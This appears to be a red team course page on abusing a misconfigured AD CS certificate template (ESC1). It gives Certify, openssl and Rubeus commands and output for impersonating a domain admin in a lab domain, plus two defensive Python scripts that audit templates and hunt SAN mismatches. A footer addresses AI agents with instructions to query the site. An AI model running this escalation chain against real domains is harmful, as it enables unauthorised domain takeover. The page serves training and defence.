# Misconfigured Certificate Templates

AD CS certificate templates are provided by Microsoft as a starting point for distributing certificates. They are designed to be duplicated and configured for specific needs. Misconfigurations within these templates can be abused for privilege escalation.

Certify can also find vulnerable templates.

```
beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe find /vulnerable
```


![](https://files.cdn.thinkific.com/file_uploads/584845/images/d7e/9d6/306/customuser.png)


Let's go through the key parts of this output.

1. This template is served by *sub-ca*.
2. The template is called *CustomUser*.
3. *ENROLLEE\_SUPPLIES\_SUBJECT* is enabled, which allows the certificate requestor to provide any SAN (subject alternative name).
4. The certificate usage has *Client Authentication* set.
5. *DEV\Domain Users* have enrollment rights, so any domain user may request a certificate from this template.

If a principal you control has WriteOwner, WriteDacl or WriteProperty on the template object, then this could also be abused.
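The three conditions listed above (requester-supplied subject, an authentication EKU, and enrollment rights for a low-privilege group) are what an audit has to test together. The script below is an added example, not code from the original page or from Certify: it evaluates template attributes as they would be exported from the Configuration partition and reports templates meeting every condition, skipping those gated by manager approval or a required RA signature. The dict layout and the sample values are constructed; the `CustomUser` entry mirrors the finding on this page.

```python
"""Audit certificate templates for the ESC1 combination described above.

Added example (not code from the original page or from Certify). It
evaluates template attributes as exported from the Configuration
partition; the dict layout and the sample values are constructed.
"""

# Bit in msPKI-Certificate-Name-Flag: requester supplies subject/SAN in the CSR.
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
# Bit in msPKI-Enrollment-Flag: every request waits for manager approval.
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002

# EKU OIDs that let the issued certificate be used for logon (PKINIT).
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2": "Client Authentication",
    "1.3.6.1.5.2.3.4": "PKINIT Client Authentication",
    "1.3.6.1.4.1.311.20.2.2": "Smart Card Logon",
    "2.5.29.37.0": "Any Purpose",
}

# Enrollment principals that amount to "any account in the domain".
LOW_PRIV_PRINCIPALS = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def enrollee_supplies_subject(name_flag: int) -> bool:
    """True when the requester may put an arbitrary SAN in the request."""
    return bool(name_flag & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)


def allows_client_auth(ekus: list) -> bool:
    """True when the certificate can authenticate a user; no EKU means no restriction."""
    return not ekus or any(oid in AUTH_EKUS for oid in ekus)


def broad_enrollers(enroll_rights: list) -> list:
    """Enrollment principals (DOMAIN\\Name) that stand for every domain user."""
    return sorted(p for p in enroll_rights if p.split("\\")[-1] in LOW_PRIV_PRINCIPALS)


def esc1_findings(templates: list) -> dict:
    """Return {template name: details} for templates meeting every ESC1 condition."""
    findings = {}
    for t in templates:
        # An approval gate or a required RA signature breaks the direct request path.
        if t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS or t["ra_signatures"] > 0:
            continue
        if not enrollee_supplies_subject(t["name_flag"]):
            continue
        if not allows_client_auth(t["ekus"]):
            continue
        enrollers = broad_enrollers(t["enroll"])
        if not enrollers:
            continue
        findings[t["name"]] = {
            "ca": t["ca"],
            "ekus": [AUTH_EKUS[o] for o in t["ekus"] if o in AUTH_EKUS] or ["no EKU restriction"],
            "enrollers": enrollers,
        }
    return findings


# Constructed sample data; CustomUser mirrors the finding shown on this page.
SAMPLE_TEMPLATES = [
    {"name": "CustomUser", "ca": "sub-ca", "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.4.1.311.10.3.4"],
     "enroll": ["DEV\\Domain Users", "DEV\\Domain Admins"]},
    # Same template after remediation: manager approval is now required.
    {"name": "CustomUser-Reviewed", "ca": "sub-ca", "name_flag": 0x1, "enrollment_flag": 0x2,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.2"],
     "enroll": ["DEV\\Domain Users"]},
    # Requester supplies the subject, but the EKU does not permit logon and
    # enrollment is restricted to admins, so it is not an ESC1 finding.
    {"name": "WebServer", "ca": "sub-ca", "name_flag": 0x1, "enrollment_flag": 0x0,
     "ra_signatures": 0, "ekus": ["1.3.6.1.5.5.7.3.1"],
     "enroll": ["DEV\\Domain Admins"]},
]

if __name__ == "__main__":
    for name, detail in esc1_findings(SAMPLE_TEMPLATES).items():
        print(f"[!] {name} on {detail['ca']}: {', '.join(detail['ekus'])}; "
              f"enrollable by {', '.join(detail['enrollers'])}")
```

Each of the three checks maps to a remediation: clear the `ENROLLEE_SUPPLIES_SUBJECT` flag so the subject is built from AD, remove authentication EKUs the template does not need, or narrow enrollment rights; requiring manager approval is the quickest interim fix for a template that must keep all three settings.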


This configuration allows any domain user to request a certificate for any other domain user (including a domain admin) and use it for authentication. Request a certificate for nlamb.

```
beacon> getuid
[*] You are DEV\bfarmer

beacon> execute-assembly C:\Tools\Certify\Certify\bin\Release\Certify.exe request /ca:dc-2.dev.cyberbotic.io\sub-ca /template:CustomUser /altname:nlamb

[*] Action: Request a Certificates
[*] Current user context    : DEV\bfarmer
[*] No subject name specified, using current context as subject.

[*] Template                : CustomUser
[*] Subject                 : CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io
[*] AltName                 : nlamb

[*] Certificate Authority   : dc-2.dev.cyberbotic.io\sub-ca

[*] CA Response             : The certificate had been issued.
[*] Request ID              : 11

[*] cert.pem         :

-----BEGIN RSA PRIVATE KEY-----
[...]
-----END RSA PRIVATE KEY-----
-----BEGIN CERTIFICATE-----
[...]
-----END CERTIFICATE-----

[*] Convert with: openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx

Certify completed in 00:00:05.4521116
```


Copy the whole certificate (both the private key and certificate) and save it to `cert.pem` on Ubuntu WSL. Then use the provided `openssl` command to convert it to pfx format.

```
ubuntu@DESKTOP-3BSK7NO ~> openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: pass123
Verifying - Enter Export Password: pass123
```


Convert `cert.pfx` into a base64 encoded string so it can be used with Rubeus.

```
ubuntu@DESKTOP-3BSK7NO ~> cat cert.pfx | base64 -w 0
MIIM7w[...]ECAggA
```


Then use `asktgt` to request a TGT for the user using the certificate.

```
beacon> execute-assembly C:\Tools\Rubeus\Rubeus\bin\Release\Rubeus.exe asktgt /user:nlamb /certificate:MIIM7w[...]ECAggA /password:pass123 /nowrap

[*] Using PKINIT with etype rc4_hmac and subject: CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io 
[*] Building AS-REQ (w/ PKINIT preauth) for: 'dev.cyberbotic.io\nlamb'
[*] Using domain controller: 10.10.122.10:88
[+] TGT request successful!
[*] base64(ticket.kirbi):

      doIGQj[...]5pbw==

  ServiceName              :  krbtgt/dev.cyberbotic.io
  ServiceRealm             :  DEV.CYBERBOTIC.IO
  UserName                 :  nlamb
  UserRealm                :  DEV.CYBERBOTIC.IO
  StartTime                :  9/7/2022 8:51:22 AM
  EndTime                  :  9/7/2022 6:51:22 PM
  RenewTill                :  9/14/2022 8:51:22 AM
  Flags                    :  name_canonicalize, pre_authent, initial, renewable, forwardable
  KeyType                  :  rc4_hmac
  Base64(key)              :  AliVFc5Nk93Z7IUkweCnBQ==
  ASREP (key)              :  4DB9D9D76701696109C28A26D27DE0B0
```
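The request above leaves a clear trace on the CA: the certificate for request ID 11 was requested by `DEV\bfarmer` but carries a SAN naming `nlamb`. The script below is an added example, not part of the original page, showing the hunt a defender would run over the CA's issued-certificate records. The records are constructed (the field names are assumptions about how an export would be shaped); request 11 mirrors the request on this page, and the `allowed_templates` parameter exists so templates where requester and SAN legitimately differ can be excluded.

```python
"""Hunt for issued certificates whose SAN UPN names a different account than the requester.

Added example, not from the original page. Records are constructed with the
shape a defender would assemble from the CA database (request id, template,
requester, subject, SAN UPN); the field names are assumptions.
"""

# Constructed records. Request 11 mirrors the request shown on this page
# (bfarmer requesting CustomUser with altname nlamb); the others are filler.
ISSUED = [
    {"request_id": 9, "template": "CustomUser", "requester": "DEV\\bfarmer",
     "subject": "CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io",
     "san_upn": "bfarmer@dev.cyberbotic.io"},
    {"request_id": 10, "template": "Machine", "requester": "DEV\\WKSTN-1$",
     "subject": "CN=wkstn-1.dev.cyberbotic.io", "san_upn": None},
    {"request_id": 11, "template": "CustomUser", "requester": "DEV\\bfarmer",
     "subject": "CN=Bob Farmer, CN=Users, DC=dev, DC=cyberbotic, DC=io",
     "san_upn": "nlamb@dev.cyberbotic.io"},
]


def account_of(requester: str) -> str:
    """'DEV\\bfarmer' -> 'bfarmer' (case-folded for comparison)."""
    return requester.split("\\")[-1].lower()


def upn_account(upn):
    """'nlamb@dev.cyberbotic.io' -> 'nlamb'; None when the certificate has no UPN SAN."""
    if not upn:
        return None
    return upn.split("@")[0].lower()


def san_mismatches(records: list, allowed_templates=()) -> list:
    """Return (request_id, requester, san_account, template) for every record
    where the SAN UPN names an account other than the requester.

    Templates listed in allowed_templates (for example a template deliberately
    used by enrollment agents) are skipped to keep the result actionable."""
    hits = []
    for r in records:
        if r["template"] in allowed_templates:
            continue
        target = upn_account(r["san_upn"])
        if target is None:
            continue  # no UPN in the SAN, nothing to compare against
        if target != account_of(r["requester"]):
            hits.append((r["request_id"], r["requester"], target, r["template"]))
    return hits


if __name__ == "__main__":
    for request_id, requester, target, template in san_mismatches(ISSUED):
        print(f"[!] request {request_id}: {requester} obtained a {template} "
              f"certificate for {target}")
```

A hit from this check is the CA-side evidence; the matching domain-controller evidence is the PKINIT TGT request for the SAN account, which arrives with certificate details rather than a password-derived pre-authentication, so correlating the two on the target account and time window confirms the chain shown above.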


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://yamortsa.gitbook.io/rto/active-directory-certificate-services/misconfigured-certificate-templates.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
